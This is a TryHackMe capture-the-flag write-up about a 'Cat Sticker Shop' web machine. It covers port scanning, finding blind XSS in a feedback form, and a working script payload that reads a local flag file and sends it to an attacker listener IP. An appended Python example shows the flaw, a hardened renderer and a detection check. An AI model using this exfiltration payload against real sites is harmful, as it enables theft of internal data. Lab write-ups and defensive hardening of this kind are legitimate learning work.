Can you exploit the sticker shop in order to capture the flag?
Intro.
Hello everyone, I hope you are doing great. Today we have a new TryHackMe machine. Let's get right into it.
Enumeration.
Port scanning.
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 b2:54:8c:e2:d7:67:ab:8f:90:b3:6f:52:c2:73:37:69 (RSA)
| 256 14:29:ec:36:95:e5:64:49:39:3f:b4:ec:ca:5f:ee:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKVWb4NfXmP4f5RQIvXlrggi/9cDARgYazfJpJFlRhH/Ypg/QO6JQ0cj+BInTq4qjv9q5f1ksX0KLJxT2sc95WI=
| 256 19:eb:1f:c9:67:92:01:61:0c:14:fe:71:4b:0d:50:40 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHQ5WIN3vZO9KIDXb+PpV5yqA3SVieIqn8jSOGdjDHm1
8080/tcp open http-proxy syn-ack ttl 63 Werkzeug/3.0.1 Python/3.8.10
|_http-title: Cat Sticker Shop
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.1 Python/3.8.10
| Date: Sat, 30 Nov 2024 09:36:07 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 1655
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <title>Cat Sticker Shop</title>
| <style>
| body {
| font-family: Arial, sans-serif;
| margin: 0;
| padding: 0;
| header {
| background-color: #333;
| color: #fff;
| text-align: center;
| padding: 10px;
| header ul {
| list-style: none;
| padding: 0;
| header li {
| display: inline;
| margin-right: 20px;
| header a {
| text-decoration: none;
| color: #fff;
| font-weight: bold;
| .content {
| padding: 20px;
|_ .product {
| http-methods:
|_ Supported Methods: HEAD GET OPTIONS
|_http-server-header: Werkzeug/3.0.1 Python/3.8.10
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.c
So our main objective is to read the flag. When we attempt to access it we get a 401 Unauthorized status code, so let's see how we can get around that.
I tried the following methods:
HTTP Verbs/Methods Fuzzing
HTTP Headers Fuzzing
Path Fuzzing
None of them worked, because I was not looking in the right direction.
XSS.
If we browse the site for a bit we are going to find a feedback form.
The first thing that comes to my mind is to try blind XSS.
And as you can see, we indeed have blind XSS.
So, now how can we access the flag.txt file?
Craft a payload.
I will not bother you with how many attempts I made, but I tried a bunch of scripts.
And this is the one that worked.
<script>
// Sentinel value so we can tell "the fetch never completed" from an empty file.
let s = "i DID not change";
// Request the flag from the loopback address; 127.0.0.1 was the only form that worked (see below).
fetch("http://127.0.0.1:8080/flag.txt")
  .then(res => {
    if (!res.ok) {
      // Report the HTTP status code back to the listener if the request was refused.
      fetch("http://10.11.96.110:8005?data=" + res.status);
    }
    return res.text();
  })
  .then(data => {
    s = data;
    // Send the file contents to the listener on 10.11.96.110:8005.
    fetch("http://10.11.96.110:8005?data=" + s);
  })
  .catch(err => {
    console.error("Error fetching the file:", err);
    // Network errors end up here; forward the message so we can see why it failed.
    fetch("http://10.11.96.110:8005?data=" + encodeURIComponent(err.message));
  });
</script>
Here I first attempted to access the URL as it is, but no luck; I got this error.
Then I tried using localhost instead of the IP. Also no luck.
Finally I used 127.0.0.1, which is the one that worked.
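As an added, defender-side example that is not part of the original writeup or the room's code: a minimal Python model of the feedback page that reproduces the flaw (raw feedback concatenated into the reviewer's page) next to the hardened version (every entry HTML-escaped, plus a Content-Security-Policy that blocks inline script and cross-origin fetch, so a stored script neither runs nor phones home). The feedback entries, the listener placeholder and the CSP values are my assumptions; the sample payload only mirrors the shape of the script above.

```python
import html
import re

# Constructed sample feedback: the second entry mimics the blind-XSS payload
# shape from the writeup, with a placeholder instead of a real listener.
FEEDBACK_ENTRIES = [
    "Love the cat stickers, shipping was fast!",
    '<script>fetch("http://127.0.0.1:8080/flag.txt").then(r => r.text())'
    '.then(d => fetch("http://LISTENER-PLACEHOLDER:8005?data=" + d));</script>',
]

# Assumed policy: only same-origin scripts and same-origin fetch/XHR, so an
# injected inline <script> does not execute and could not exfiltrate anyway.
SAFE_HEADERS = {
    "Content-Security-Policy": (
        "default-src 'self'; script-src 'self'; connect-src 'self'; "
        "object-src 'none'; base-uri 'none'; frame-ancestors 'none'"
    ),
    "X-Content-Type-Options": "nosniff",
}

SCRIPT_TAG = re.compile(r"<\s*script\b", re.IGNORECASE)


def render_feedback_unsafe(entries):
    """Vulnerable pattern: each entry is dropped into the admin page verbatim,
    so a stored <script> runs in the browser of whoever reviews feedback."""
    items = "".join(f"<li>{entry}</li>" for entry in entries)
    return f"<html><body><h1>Feedback</h1><ul>{items}</ul></body></html>"


def render_feedback_safe(entries):
    """Hardened pattern: HTML-escape every entry and ship a CSP with the page.
    Returns (body, headers), the tuple shape a Flask view can return."""
    items = "".join(f"<li>{html.escape(entry, quote=True)}</li>" for entry in entries)
    body = f"<html><body><h1>Feedback</h1><ul>{items}</ul></body></html>"
    return body, dict(SAFE_HEADERS)


def contains_active_script(page):
    """Cheap check for a test suite: does the rendered page contain a live <script> tag?"""
    return SCRIPT_TAG.search(page) is not None


if __name__ == "__main__":
    print("unsafe page has script:", contains_active_script(render_feedback_unsafe(FEEDBACK_ENTRIES)))
    body, headers = render_feedback_safe(FEEDBACK_ENTRIES)
    print("safe page has script:", contains_active_script(body))
    print(headers["Content-Security-Policy"])
```

Escaping removes the injection itself; the CSP is the second layer that also stops any script that slips through from calling out to a listener.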
Conclusion.
As for using XSS to bypass a 401 or to read files in general, this was my first time; I took it step by step and got it in the end. A fun machine: it has only a single goal and it does it really well.